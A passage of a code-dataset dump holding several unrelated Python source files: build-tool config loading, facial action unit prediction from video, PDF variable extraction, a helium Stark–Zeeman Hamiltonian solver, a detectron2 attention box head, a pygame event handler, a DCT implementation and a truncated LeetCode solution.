self._ToolDef\r\n\r\n def _GetToolDef(self):\r\n TargetObj = TargetTxtDict()\r\n Target = TargetObj.Target\r\n ToolDef = ToolDefClassObject()\r\n if TAB_TAT_DEFINES_TOOL_CHAIN_CONF in Target.TargetTxtDictionary:\r\n ToolsDefFile = Target.TargetTxtDictionary[TAB_TAT_DEFINES_TOOL_CHAIN_CONF]\r\n if ToolsDefFile:\r\n ToolDef.LoadToolDefFile(os.path.normpath(ToolsDefFile))\r\n else:\r\n ToolDef.LoadToolDefFile(os.path.normpath(os.path.join(self.ConfDir, gDefaultToolsDefFile)))\r\n else:\r\n ToolDef.LoadToolDefFile(os.path.normpath(os.path.join(self.ConfDir, gDefaultToolsDefFile)))\r\n self._ToolDef = ToolDef\r\n\r\n##\r\n#\r\n# This acts like the main() function for the script, unless it is 'import'ed into another\r\n# script.\r\n#\r\nif __name__ == '__main__':\r\n ToolDef = ToolDefDict(os.getenv(\"WORKSPACE\"))\r\n pass\r\n","repo_name":"CloverHackyColor/CloverBootloader","sub_path":"BaseTools/Source/Python/Common/ToolDefClassObject.py","file_name":"ToolDefClassObject.py","file_ext":"py","file_size_in_byte":12862,"program_lang":"python","lang":"en","doc_type":"code","stars":4186,"dataset":"github-code","pt":"53"} +{"seq_id":"41256528630","text":"from os.path import join, abspath, dirname\nfrom feat import Detector\nimport pandas as pd\nfrom tqdm import tqdm\nimport json\n\ndef openListOnFile ():\n with open ((join(dirname(abspath(__file__)), \"predictions.json\")), \"w\") as f:\n f.write(\"[\\n\")\n\ndef closeListOnFile ():\n with open ((join(dirname(abspath(__file__)), \"predictions.json\")), \"a\") as f:\n f.write(\"\\n]\")\n\ndef getPrediction (videoPath:str, detector:Detector) -> pd.DataFrame:\n return detector.detect_video(videoPath) #skip_frames = None\n\ndef cleanPrediction (predictions: pd.DataFrame) -> pd.DataFrame:\n #removal of unused columns\n newPredictions = predictions.filter(regex='^AU')\n return pd.concat([newPredictions, predictions[\"input\"]], axis=1)\n\ndef getPredictionsFromVideosPaths (videoPath:list, detector:Detector, lastOne:bool) -> pd.DataFrame:\n prediciton = getPrediction (videoPath, detector)#qui ho già la predizione per tutti i frame all'interno del video\n prediciton = cleanPrediction (prediciton)\n \n if not lastOne:\n with open ((join(dirname(abspath(__file__)), \"predictions.json\")), \"a\") as f:\n f.write(prediciton.to_json(indent=4) + \",\\n\")\n else:\n with open ((join(dirname(abspath(__file__)), \"predictions.json\")), \"a\") as f:\n f.write(prediciton.to_json(indent=4))\n\ndef makeAndSavePredictionsOnFile (videosPathMain: list, detector:Detector) -> list [dict]:\n openListOnFile () # i save the predictions on file but the list of the objects generated is not json serializable *\n for path in tqdm(videosPathMain):\n try:\n getPredictionsFromVideosPaths(path, detector, path == videosPathMain[-1])\n except Exception as e:\n print (e)\n closeListOnFile() # * so i open and close the list on the file and save each item in append on the file \n\n\ndef readPredictionsListFromFile () -> list [dict]:\n with open ((join(dirname(abspath(__file__)), \"predictions.json\")), \"r\") as f:\n data = json.load(f)\n\n return data","repo_name":"AlessandroCarella/bachelor-s-thesis","sub_path":"src/WOman/getPredictionsAndSaveThemOnFile.py","file_name":"getPredictionsAndSaveThemOnFile.py","file_ext":"py","file_size_in_byte":2008,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"10085906108","text":"from typing import Dict, List, Any\nfrom config import get_dataset_config as config\nfrom utils.pdf_reader import PdfExtractVariables\nimport os\nimport glob\nimport json\n\n# Retrieve datasets\nprint(\"Retrieving datasets...\")\ndatasets_path = config.DATASETS_PATH\n\ndatasets_list = os.scandir(datasets_path)\ndatasets_list = [data.path for data in datasets_list if data.is_dir()]\n\n# Instantiate dictionary\ndictionary: Dict[Any, Dict[Any, List[Any]]] = {}\n\n# Get variables\nprint(\"Extracting variables from datatables...\")\nfor data in datasets_list:\n print(\"Pdf: {}\".format(data))\n # Get pdf of variables\n variables_pdf = glob.glob(os.path.sep.join([data, 'Descripcion_Archivos', '*.pdf']))[0]\n\n # Extract pdf information\n variables_pdf = PdfExtractVariables(variables_pdf)\n\n # Get databases and descriptions\n databases_list, databases_descriptions = variables_pdf.get_databases_list()\n\n # Get dictionary\n database_dict = variables_pdf.get_databases(databases_list, databases_descriptions)\n\n # Convert tables obtained in dictionary from df to json in order to serialize\n for (data_name, (data_desc, data_table)) in database_dict.items():\n table = data_table.copy()\n table.reset_index(inplace=True, drop=True)\n table = table.rename(columns=table.iloc[0]).drop(table.index[0])\n table.reset_index(inplace=True, drop=True)\n database_dict[data_name][1] = table.to_json()\n\n # Append to overall dictionary\n dictionary[data] = database_dict\n\n# Save dictionary as json file\nprint(\"Loading extracted variables to json dictionary...\")\noutput_path = config.VARIABLE_DICTIONARIES_PATH\nwith open(os.sep.join([output_path, 'dictionary.json']), 'w') as file:\n json.dump(dictionary, file, sort_keys=False)\n","repo_name":"avaimar/INEGI_Revolution","sub_path":"02_Scripts/01_Process_data/02_Get_variables_from_pdf.py","file_name":"02_Get_variables_from_pdf.py","file_ext":"py","file_size_in_byte":1754,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"32995011351","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed 04 Jul 2017\n\n@author: Alex Morgan, UNIVERSITY COLLEGE LONDON.\n\"\"\"\nfrom operator import attrgetter\nimport numpy as np\nfrom tqdm import trange\nfrom .Basis import Basis, basis_states\nfrom .State import State, get_qd, energy\nfrom .InteractionMatrix import InteractionMatrix, stark_interaction, zeeman_interaction\nfrom .constants import *\nfrom .numerov import wf\n\nclass HamiltonianMatrix(object):\n \"\"\" The total Hamiltonian matrix. Each element of the basis set is an\n instance of the class 'State', which represents |n L S J MJ>.\n \"\"\"\n def __init__(self, n_min, n_max, L_max=None, S=None, M=None, M_max=None, basis_type='ml'):\n self.basis = basis_states(basis_type.lower(), n_min, n_max, L_max=L_max, S=S, M=M, M_max=M_max)\n self.sort_basis('E0', inplace=True)\n self.num_states = len(self.basis.states)\n self._h0_matrix = None\n self._stark_matrix = None\n self._zeeman_matrix = None\n \n def sort_basis(self, attribute, inplace=False):\n \"\"\" Sort basis on attribute.\n \"\"\"\n sorted_basis = sorted(self.basis.states, key=attrgetter(attribute))\n if inplace:\n self.basis.states = sorted_basis\n return sorted_basis\n\n def attrib(self, attribute):\n \"\"\" List of given attribute values from all elements in the basis, e.g., J or E0.\n \"\"\"\n return [getattr(el, attribute) for el in self.basis.states]\n\n def where(self, attribute, value):\n \"\"\" Indexes of where basis.attribute == value.\n \"\"\"\n arr = self.attrib(attribute)\n return [i for i, x in enumerate(arr) if x == value]\n \n def __str__(self):\n \"\"\" To String method\n \"\"\"\n return str(self.basis)\n\n def h0_matrix(self, **kwargs):\n \"\"\" Unperturbed Hamiltonian.\n \"\"\"\n cache = kwargs.get('cache_matrices', True)\n if self._h0_matrix is None or cache is False:\n self._h0_matrix = np.diag(self.attrib('E0'))\n return self._h0_matrix\n \n def stark_map(self, Efield, Bfield=0.0, **kwargs):\n \"\"\" The eigenvalues of H_0 + H_S + H_Z, for a range of electric fields.\n \n args:\n Efield dtype: list units: V / m \n\n Bfield=0.0 dtype: float units: T\n \n kwargs:\n field_angle=0.0 dtype: [float]\n\n specifies the angle between the electric and magnetic fields.\n \n eig_vec=False dtype: bool\n\n returns the eigenvalues and eigenvectors for \n every field value.\n\n Nb. A large map with eignvectors can take up a LOT of memory.\n \"\"\"\n if (not kwargs.get('field_angle', 0.0) == 0.0) and \\\n ((not self.M == None) or (not self.M_max == None)):\n print('WARNING: If the fields are not parallel then all'+\\\n ' ML sub-manifolds are required for accurate results!')\n \n tqdm_kwargs = dict([(x.replace('tqdm_', ''), kwargs[x]) for x in kwargs.keys() if 'tqdm_' in x])\n get_eig_vec = kwargs.get('eig_vec', False)\n num_fields = len(Efield)\n # initialise output arrays\n eig_val = np.empty((num_fields, self.num_states), dtype=float)\n if get_eig_vec:\n eig_vec = np.empty((num_fields, self.num_states, self.num_states), dtype=float)\n # optional magnetic field\n if Bfield != 0.0:\n Bz = mu_B * Bfield / En_h\n self._zeeman_matrix = InteractionMatrix(matrix_type='zeeman', basis=self.basis, **kwargs)\n H_Z = Bz * self._zeeman_matrix.matrix\n else:\n H_Z = 0.0\n # loop over electric field values\n self._stark_matrix = InteractionMatrix(matrix_type='stark', basis=self.basis, **kwargs)\n for i in trange(num_fields, desc=\"Diagonalise Hamiltonian\", **tqdm_kwargs):\n Fz = Efield[i] * e * a_0 / En_h\n H_S = Fz * self._stark_matrix.matrix / mu_me\n # diagonalise, assuming matrix is Hermitian.\n if get_eig_vec:\n # eigenvalues and eigenvectors\n eig_val[i], eig_vec[i] = np.linalg.eigh(self.h0_matrix(**kwargs) + H_S + H_Z) \n else:\n # eigenvalues\n eig_val[i] = np.linalg.eigh(self.h0_matrix(**kwargs) + H_S + H_Z)[0]\n # output\n if get_eig_vec:\n return eig_val * En_h_He/mu_me, eig_vec\n else:\n return eig_val * En_h_He/mu_me\n\n def zeeman_map(self, Bfield, Efield=0.0, **kwargs):\n \"\"\" The eigenvalues of H_0 + H_S + H_Z, for a range of magnetic fields.\n \n args:\n Bfield dtype: list units: T \n\n Efield=0.0 dtype: float units: V / m\n \n kwargs:\n field_angle=0.0 dtype: [float]\n\n specifies the angle between the electric and magnetic fields.\n \n eig_vec=False dtype: bool\n\n returns the eigenvalues and eigenvectors for \n every field value.\n \n Nb. A large map with eignvectors can take up a LOT of memory.\n \"\"\"\n tqdm_kwargs = dict([(x.replace('tqdm_', ''), kwargs[x]) for x in kwargs.keys() if 'tqdm_' in x])\n get_eig_vec = kwargs.get('eig_vec', False)\n num_fields = len(Bfield)\n # initialise output arrays\n eig_val = np.empty((num_fields, self.num_states), dtype=float)\n if get_eig_vec:\n eig_vec = np.empty((num_fields, self.num_states, self.num_states), dtype=float)\n # optional electric field\n if Efield != 0.0:\n Fz = Efield * e * a_0 / En_h\n self._stark_matrix = InteractionMatrix(matrix_type='stark', basis=self.basis, **kwargs)\n H_S = Fz * self._stark_matrix.matrix / mu_me\n else:\n H_S = 0.0\n # loop over magnetic field values\n self._zeeman_matrix = InteractionMatrix(matrix_type='zeeman', basis=self.basis, **kwargs)\n for i in trange(num_fields, desc=\"Diagonalise Hamiltonian\", **tqdm_kwargs):\n Bz = mu_B * Bfield[i] / En_h\n H_Z = Bz * self._zeeman_matrix.matrix \n # diagonalise, assuming matrix is Hermitian.\n if get_eig_vec:\n # eigenvalues and eigenvectors\n eig_val[i], eig_vec[i] = np.linalg.eigh(self.h0_matrix(**kwargs) + H_S + H_Z) \n else:\n # eigenvalues\n eig_val[i] = np.linalg.eigh(self.h0_matrix(**kwargs) + H_S + H_Z)[0]\n # output\n if get_eig_vec:\n return eig_val * En_h, eig_vec\n else:\n return eig_val * En_h","repo_name":"aa-morgan/helium-stark-zeeman","sub_path":"hsz/HamiltonianMatrix.py","file_name":"HamiltonianMatrix.py","file_ext":"py","file_size_in_byte":6939,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"53"} +{"seq_id":"71103387047","text":"# Based on https://github.com/Scalsol/mega.pytorch/blob/master/mega_core/modeling/roi_heads/box_head/roi_box_feature_extractors.py\n# and https://github.com/facebookresearch/detectron2/blob/v0.1.1/detectron2/modeling/roi_heads/box_head.py\nimport math\n\nimport numpy as np\nimport torch\nimport fvcore.nn.weight_init as weight_init\nfrom torch import nn\nfrom torch.nn import functional as F\n\nfrom detectron2.layers import Conv2d, ShapeSpec, get_norm\nfrom detectron2.modeling.roi_heads import ROI_BOX_HEAD_REGISTRY\n\nclass AttentionExtractor(nn.Module):\n def __init__(self, cfg, in_channels):\n super(AttentionExtractor, self).__init__()\n\n @staticmethod\n def extract_position_embedding(position_mat, feat_dim, wave_length=1000.0):\n device = position_mat.device\n # position_mat, [num_rois, num_nongt_rois, 4]\n feat_range = torch.arange(0, feat_dim / 8, device=device)\n dim_mat = torch.full((len(feat_range),), wave_length, device=device).pow(8.0 / feat_dim * feat_range)\n dim_mat = dim_mat.view(1, 1, 1, -1).expand(*position_mat.shape, -1)\n\n position_mat = position_mat.unsqueeze(3).expand(-1, -1, -1, dim_mat.shape[3])\n position_mat = position_mat * 100.0\n\n div_mat = position_mat / dim_mat\n sin_mat, cos_mat = div_mat.sin(), div_mat.cos()\n\n # [num_rois, num_nongt_rois, 4, feat_dim / 4]\n embedding = torch.cat([sin_mat, cos_mat], dim=3)\n # [num_rois, num_nongt_rois, feat_dim]\n embedding = embedding.reshape(embedding.shape[0], embedding.shape[1], embedding.shape[2] * embedding.shape[3])\n\n return embedding\n\n @staticmethod\n def extract_position_matrix(bbox, ref_bbox):\n xmin, ymin, xmax, ymax = torch.chunk(ref_bbox, 4, dim=1)\n bbox_width_ref = xmax - xmin + 1\n bbox_height_ref = ymax - ymin + 1\n center_x_ref = 0.5 * (xmin + xmax)\n center_y_ref = 0.5 * (ymin + ymax)\n\n xmin, ymin, xmax, ymax = torch.chunk(bbox, 4, dim=1)\n bbox_width = xmax - xmin + 1\n bbox_height = ymax - ymin + 1\n center_x = 0.5 * (xmin + xmax)\n center_y = 0.5 * (ymin + ymax)\n\n delta_x = center_x - center_x_ref.transpose(0, 1)\n delta_x = delta_x / bbox_width\n delta_x = (delta_x.abs() + 1e-3).log()\n\n delta_y = center_y - center_y_ref.transpose(0, 1)\n delta_y = delta_y / bbox_height\n delta_y = (delta_y.abs() + 1e-3).log()\n\n delta_width = bbox_width / bbox_width_ref.transpose(0, 1)\n delta_width = delta_width.log()\n\n delta_height = bbox_height / bbox_height_ref.transpose(0, 1)\n delta_height = delta_height.log()\n\n position_matrix = torch.stack([delta_x, delta_y, delta_width, delta_height], dim=2)\n\n return position_matrix\n\n def attention_module_multi_head(self, roi_feat, ref_feat, position_embedding,\n feat_dim=1024, dim=(1024, 1024, 1024), group=16,\n index=0):\n \"\"\"\n :param roi_feat: [num_rois, feat_dim]\n :param ref_feat: [num_nongt_rois, feat_dim]\n :param position_embedding: [1, emb_dim, num_rois, num_nongt_rois]\n :param feat_dim: should be same as dim[2]\n :param dim: a 3-tuple of (query, key, output)\n :param group:\n :return:\n \"\"\"\n dim_group = (dim[0] / group, dim[1] / group, dim[2] / group)\n\n # position_embedding, [1, emb_dim, num_rois, num_nongt_rois]\n # -> position_feat_1, [1, group, num_rois, num_nongt_rois]\n if position_embedding is not None:\n position_feat_1 = F.relu(self.Wgs[index](position_embedding))\n # aff_weight, [num_rois, group, num_nongt_rois, 1]\n aff_weight = position_feat_1.permute(2, 1, 3, 0)\n # aff_weight, [num_rois, group, num_nongt_rois]\n aff_weight = aff_weight.squeeze(3)\n \n # multi head\n assert dim[0] == dim[1]\n\n q_data = self.Wqs[index](roi_feat)\n q_data_batch = q_data.reshape(-1, group, int(dim_group[0]))\n # q_data_batch, [group, num_rois, dim_group[0]]\n q_data_batch = q_data_batch.permute(1, 0, 2)\n\n k_data = self.Wks[index](ref_feat)\n k_data_batch = k_data.reshape(-1, group, int(dim_group[1]))\n # k_data_batch, [group, num_nongt_rois, dim_group[1]]\n k_data_batch = k_data_batch.permute(1, 0, 2)\n\n # v_data, [num_nongt_rois, feat_dim]\n v_data = ref_feat\n\n # aff, [group, num_rois, num_nongt_rois]\n aff = torch.bmm(q_data_batch, k_data_batch.transpose(1, 2))\n aff_scale = (1.0 / math.sqrt(float(dim_group[1]))) * aff\n # aff_scale, [num_rois, group, num_nongt_rois]\n aff_scale = aff_scale.permute(1, 0, 2)\n\n # weighted_aff, [num_rois, group, num_nongt_rois]\n if position_embedding is not None:\n weighted_aff = (aff_weight + 1e-6).log() + aff_scale\n else:\n weighted_aff = aff_scale\n aff_softmax = F.softmax(weighted_aff, dim=2)\n\n aff_softmax_reshape = aff_softmax.reshape(aff_softmax.shape[0] * aff_softmax.shape[1], aff_softmax.shape[2])\n\n # output_t, [num_rois * group, feat_dim]\n output_t = torch.matmul(aff_softmax_reshape, v_data)\n # output_t, [num_rois, group * feat_dim, 1, 1]\n output_t = output_t.reshape(-1, group * feat_dim, 1, 1)\n # linear_out, [num_rois, dim[2], 1, 1]\n linear_out = self.Wvs[index](output_t)\n\n output = linear_out.squeeze(3).squeeze(2)\n mean_weight = torch.mean(aff_softmax, dim=1)\n\n return output, mean_weight\n\n def cal_position_embedding(self, rois1, rois2):\n # [num_rois, num_nongt_rois, 4]\n position_matrix = self.extract_position_matrix(rois1, rois2)\n # [num_rois, num_nongt_rois, 64]\n position_embedding = self.extract_position_embedding(position_matrix, feat_dim=64)\n\n # [64, num_rois, num_nongt_rois]\n position_embedding = position_embedding.permute(2, 0, 1)\n\n # TODO: might not be necessary with new PyTorch versions: https://github.com/pytorch/pytorch/issues/29992\n position_embedding = position_embedding.contiguous()\n\n # [1, 64, num_rois, num_nongt_rois]\n position_embedding = position_embedding.unsqueeze(0)\n\n return position_embedding\n\n\n######################################################################\n@ROI_BOX_HEAD_REGISTRY.register()\nclass AttentionFCHead(AttentionExtractor):\n \"\"\"\n A head with several 3x3 conv layers (each followed by norm & relu) and\n several fc layers (each followed by relu).\n \"\"\"\n\n def __init__(self, cfg, input_shape: ShapeSpec):\n \"\"\"\n The following attributes are parsed from config:\n num_conv, num_fc: the number of conv/fc layers\n conv_dim/fc_dim: the dimension of the conv/fc layers\n norm: normalization for the conv layers\n \"\"\"\n super().__init__(cfg, input_shape)\n\n\n # TODO: move to layers.py?\n def make_fc(dim_in, hidden_dim, use_gn=False):\n '''\n Caffe2 implementation uses XavierFill, which in fact\n corresponds to kaiming_uniform_ in PyTorch\n '''\n assert not use_gn\n # if use_gn:\n # fc = nn.Linear(dim_in, hidden_dim, bias=False)\n # nn.init.kaiming_uniform_(fc.weight, a=1)\n # return nn.Sequential(fc, group_norm(hidden_dim))\n fc = nn.Linear(dim_in, hidden_dim)\n nn.init.kaiming_uniform_(fc.weight, a=1)\n nn.init.constant_(fc.bias, 0)\n return fc\n\n # fmt: off\n fc_dim = cfg.MODEL.ROI_BOX_HEAD.FC_DIM\n norm = cfg.MODEL.ROI_BOX_HEAD.NORM\n\n self.embed_dim = cfg.MODEL.SPATIOTEMPORAL.ROI_BOX_HEAD.ATTENTION.EMBED_DIM\n self.groups = cfg.MODEL.SPATIOTEMPORAL.ROI_BOX_HEAD.ATTENTION.GROUP\n self.feat_dim = fc_dim\n self.base_stage = cfg.MODEL.SPATIOTEMPORAL.ROI_BOX_HEAD.ATTENTION.STAGE\n self.advanced_stage = cfg.MODEL.SPATIOTEMPORAL.ROI_BOX_HEAD.ATTENTION.ADVANCED_STAGE\n self.base_num = cfg.MODEL.SPATIOTEMPORAL.ROI_BOX_HEAD.REF_POST_NMS_TOP_N\n self.advanced_num = int(self.base_num * cfg.MODEL.SPATIOTEMPORAL.ROI_BOX_HEAD.RDN_RATIO)\n self.location_free = cfg.MODEL.SPATIOTEMPORAL.ROI_BOX_HEAD.ATTENTION.LOCATION_FREE\n # fmt: on\n\n self._output_size = (input_shape.channels, input_shape.height, input_shape.width)\n input_size = np.prod((input_shape.channels, input_shape.height, input_shape.width))\n\n\n fcs, Wgs, Wqs, Wks, Wvs = [], [], [], [], []\n for i in range(self.base_stage + self.advanced_stage + 1):\n r_size = input_size if i == 0 else fc_dim\n\n if i == self.base_stage and self.advanced_stage == 0:\n break\n\n if i != self.base_stage + self.advanced_stage:\n fcs.append(make_fc(r_size, fc_dim))\n self._output_size = fc_dim\n Wgs.append(Conv2d(self.embed_dim, self.groups, kernel_size=1, stride=1, padding=0))\n Wqs.append(make_fc(self.feat_dim, self.feat_dim))\n Wks.append(make_fc(self.feat_dim, self.feat_dim))\n Wvs.append(Conv2d(self.feat_dim * self.groups, self.feat_dim, kernel_size=1, stride=1, padding=0, groups=self.groups))\n for l in [Wgs[i], Wvs[i]]:\n torch.nn.init.normal_(l.weight, std=0.01)\n torch.nn.init.constant_(l.bias, 0)\n self.fcs = nn.ModuleList(fcs)\n self.Wgs = nn.ModuleList(Wgs)\n self.Wqs = nn.ModuleList(Wqs)\n self.Wks = nn.ModuleList(Wks)\n self.Wvs = nn.ModuleList(Wvs)\n\n\n def forward(self, x, proposals, long_term_feature_buffer, long_term_roi_buffer, pre_calculate=False):\n if self.training:\n return self._forward_train(x, proposals, long_term_feature_buffer, long_term_roi_buffer)\n else:\n return self._forward_test(x, proposals, long_term_feature_buffer, long_term_roi_buffer)\n\n\n def _forward_test(self, x, proposals, long_term_feature_buffer, long_term_roi_buffer):\n\n assert len(proposals) == 1\n rois_cur = proposals[0].tensor\n rois_ref = torch.cat(list(long_term_roi_buffer) + [rois_cur[:self.base_num]])\n x = x.flatten(start_dim=1)\n \n if not self.location_free:\n position_embedding = self.cal_position_embedding(rois_cur, rois_ref)\n else:\n position_embedding = None\n\n for i in range(self.base_stage):\n x = F.relu(self.fcs[i](x))\n if i == 0:\n x_out = x[:self.base_num]\n x_refs = torch.cat(list(long_term_feature_buffer) + [x[:self.base_num]])\n attention, weights = self.attention_module_multi_head(x, x_refs, position_embedding,\n feat_dim=1024, group=16, dim=(1024, 1024, 1024),\n index=i)\n weights = weights.reshape(weights.shape[0], len(long_term_feature_buffer)+1,-1)\n\n x = x + attention\n\n if self.advanced_stage > 0:\n x_refs_adv = torch.cat([x[:self.advanced_num] for x in torch.split(x_refs, self.base_num, dim=0)], dim=0)\n rois_ref_adv = torch.cat([x[:self.advanced_num] for x in torch.split(rois_ref, self.base_num, dim=0)], dim=0)\n\n if not self.location_free:\n position_embedding_adv = torch.cat([x[..., :self.advanced_num] for x in torch.split(position_embedding, self.base_num, dim=-1)], dim=-1)\n position_embedding = self.cal_position_embedding(rois_ref_adv, rois_ref)\n else:\n position_embedding_adv = None\n position_embedding = None\n\n for i in range(self.advanced_stage):\n attention, _ = self.attention_module_multi_head(x_refs_adv, x_refs, position_embedding,\n feat_dim=1024, group=16, dim=(1024, 1024, 1024),\n index=i + self.base_stage)\n x_refs_adv = x_refs_adv + attention\n x_refs_adv = F.relu(self.fcs[i + self.base_stage](x_refs_adv))\n\n attention, _ = self.attention_module_multi_head(x, x_refs_adv, position_embedding_adv,\n feat_dim=1024, group=16, dim=(1024, 1024, 1024),\n index=self.base_stage + self.advanced_stage)\n x = x + attention\n\n return x, x_out, weights\n\n\n def _forward_train(self, x, proposals, long_term_feature_buffer, long_term_roi_buffer):\n\n assert len(proposals) == 1\n rois_cur = proposals[0].tensor\n rois_ref = torch.cat(list(long_term_roi_buffer))\n\n if not self.location_free:\n position_embedding = self.cal_position_embedding(rois_cur, rois_ref)\n else:\n position_embedding = None\n\n long_term_feature_buffer = [f.flatten(start_dim=1) for f in long_term_feature_buffer]\n x = x.flatten(start_dim=1)\n\n x_refs = torch.cat(list(long_term_feature_buffer))\n x_refs = F.relu(self.fcs[0](x_refs))\n\n for i in range(self.base_stage):\n x = F.relu(self.fcs[i](x))\n attention, _ = self.attention_module_multi_head(x, x_refs, position_embedding,\n feat_dim=1024, group=16, dim=(1024, 1024, 1024),\n index=i)\n x = x + attention\n\n if self.advanced_stage > 0:\n x_refs_adv = torch.cat([x[:self.advanced_num] for x in torch.split(x_refs, self.base_num, dim=0)], dim=0)\n rois_ref_adv = torch.cat([x[:self.advanced_num] for x in torch.split(rois_ref, self.base_num, dim=0)], dim=0)\n\n if not self.location_free:\n position_embedding_adv = torch.cat([x[..., :self.advanced_num] for x in torch.split(position_embedding, self.base_num, dim=-1)], dim=-1)\n position_embedding = self.cal_position_embedding(rois_ref_adv, rois_ref)\n else:\n position_embedding_adv = None\n position_embedding = None\n\n for i in range(self.advanced_stage):\n attention, _ = self.attention_module_multi_head(x_refs_adv, x_refs, position_embedding,\n feat_dim=1024, group=16, dim=(1024, 1024, 1024),\n index=i + self.base_stage)\n x_refs_adv = x_refs_adv + attention\n x_refs_adv = F.relu(self.fcs[i + self.base_stage](x_refs_adv))\n\n attention, _ = self.attention_module_multi_head(x, x_refs_adv, position_embedding_adv,\n feat_dim=1024, group=16, dim=(1024, 1024, 1024),\n index=self.base_stage + self.advanced_stage)\n x = x + attention\n\n return x, None, None\n\n\n @property\n def output_size(self):\n return self._output_size\n\n\ndef build_st_box_head(cfg, input_shape):\n \"\"\"\n Build a box head defined by `cfg.MODEL.SPATIOTEMPORAL.ROI_BOX_HEAD.NAME`.\n \"\"\"\n name = cfg.MODEL.SPATIOTEMPORAL.ROI_BOX_HEAD.NAME\n return ROI_BOX_HEAD_REGISTRY.get(name)(cfg, input_shape)","repo_name":"daniel-cores/SLTnet","sub_path":"spatiotemporal/modeling/roi_heads/st_box_head.py","file_name":"st_box_head.py","file_ext":"py","file_size_in_byte":15577,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"53"} +{"seq_id":"36740755652","text":"import sys\n\nimport pygame\nfrom ship import Ship\nfrom settings import Settings\n\n\ndef check_events(ship):\n \"\"\"响应按键和鼠标事件\"\"\"\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n sys.exit()\n elif event.type == pygame.KEYDOWN:\n check_keydown_events(event, ship)\n elif event.type == pygame.KEYUP:\n check_keyup_events(event, ship)\n\n\ndef check_keydown_events(event, ship):\n \"\"\"响应键按下\"\"\"\n if event.key == pygame.K_RIGHT:\n ship.moving_right = True\n elif event.key == pygame.K_LEFT:\n ship.moving_left = True\n\n\ndef check_keyup_events(event, ship):\n \"\"\"响应键松开\"\"\"\n if event.key == pygame.K_RIGHT:\n ship.moving_right = False\n elif event.key == pygame.K_LEFT:\n ship.moving_left = False\n\n\ndef update_screen(ai_settings, screen, ship):\n \"\"\"更新屏幕上的图像,并且切换到新屏幕\"\"\"\n screen.fill(ai_settings.bg_color)\n\n ship.blitme()\n\n pygame.display.flip()\n","repo_name":"wanglinyou33/alien_invasion","sub_path":"game_functions.py","file_name":"game_functions.py","file_ext":"py","file_size_in_byte":1018,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"39868284144","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated: Brayan Quiceno\r\nLicense: Grupo de Geofísica y Ciencias de la Computación - GGC3\r\n Institución Universitaria ITM\r\n Medellín, Antioquia, Colombia\r\n\"\"\"\r\n#%% Libraries\r\nimport math\r\nimport matplotlib.pyplot as plt\r\nimport numpy as np\r\nimport scipy\r\n\r\n#%% Function\r\ndef dct1D(x, q):\r\n N = len(x)\r\n \r\n DCT = []\r\n for k in range(1, q+1):\r\n # Kronecker Delta δ #\r\n if k==1: δ=1 #\r\n else: δ=0 #\r\n #####################\r\n \r\n summation = 0\r\n for n in range(1, N+1):\r\n index = x[n-1]*(1/math.sqrt(1+δ))*math.cos((math.pi*(2*n-1)*(k-1))/(2*N))\r\n summation += index\r\n DCT.append(math.sqrt(2/N)*summation)\r\n return DCT\r\n\r\n#%% Main Code\r\nif __name__ == \"__main__\":\r\n\r\n data = np.array([0, 0, 0, 20, 0, 0, 0, 0, 0, 20, 50, 20, 0, 0, 0, 7, 50, \r\n 90, 50, 7, 0,0, 0, 20, 50, 20, 0, 0, 0, 0, 0, 20, 0, 0,0])\r\n \r\n plt.figure()\r\n y = dct1D(data, 20)\r\n plt.plot(data, label=\"Original Data\")\r\n plt.plot(y, label=\"Original Data in DCT Space\")\r\n plt.title(\"Discrete Cosine Transform by Lopane\")\r\n plt.legend()\r\n \r\n plt.figure()\r\n y = scipy.fftpack.dct(data, norm=\"ortho\")\r\n plt.plot(data, label=\"Original Data\")\r\n plt.plot(y, label=\"Original Data in DCT Space\")\r\n plt.title(\"Discrete Cosine Transform Using Scipy Library\")\r\n plt.legend()","repo_name":"brianhavk/Python","sub_path":"Discrete Cosine Transform.py","file_name":"Discrete Cosine Transform.py","file_ext":"py","file_size_in_byte":1445,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"72070799527","text":"# 请你将一些箱子装在 一辆卡车 上。给你一个二维数组 boxTypes ,其中 boxTypes[i] = [numberOfBoxesi, \n# numberOfUnitsPerBoxi] : \n# \n# \n# numberOfBoxesi 是类型 i 的箱子的数量。 \n# numberOfUnitsPerBoxi 是类型 i 每个箱子可以装载的单元数量。 \n# \n# \n# 整数 truckSize 表示卡车上可以装载 箱子 的 最大数量 。只要箱子数量不超过 truckSize ,你就可以选择任意箱子装到卡车上。 \n# \n# 返回卡车可以装载 单元 的 最大 总数。 \n# \n# \n# \n# 示例 1: \n# \n# \n# 输入:boxTypes = [[1,3],[2,2],[3,1]], truckSize = 4\n# 输出:8\n# 解释:箱子的情况如下:\n# - 1 个第一类的箱子,里面含 3 个单元。\n# - 2 个第二类的箱子,每个里面含 2 个单元。\n# - 3 个第三类的箱子,每个里面含 1 个单元。\n# 可以选择第一类和第二类的所有箱子,以及第三类的一个箱子。\n# 单元总数 = (1 * 3) + (2 * 2) + (1 * 1) = 8 \n# \n# 示例 2: \n# \n# \n# 输入:boxTypes = [[5,10],[2,5],[4,7],[3,9]], truckSize = 10\n# 输出:91\n# \n# \n# \n# \n# 提示: \n# \n# \n# 1 <= boxTypes.length <= 1000 \n# 1 <= numberOfBoxesi, numberOfUnitsPerBoxi <= 1000 \n# 1 <= truckSize <= 10⁶ \n# \n# \n# 👍 98 👎 0\n\nfrom typing import List\n\n\n# leetcode submit region begin(Prohibit modification and deletion)\nclass Solution:\n def maximumUnits(self, boxTypes: List[List[int]], truckSize: int) -> int:\n \"\"\"\n 方法1:排序,先装最大的\n \"\"\"\n n = len(boxTypes)\n boxTypes.sort(key=lambda b: b[1], reverse=True)\n res = 0\n temp = 0\n i = 0\n while i < n:\n bt = boxTypes[i]\n num, units = bt[0], bt[1]\n if temp + num <= truckSize:\n temp += 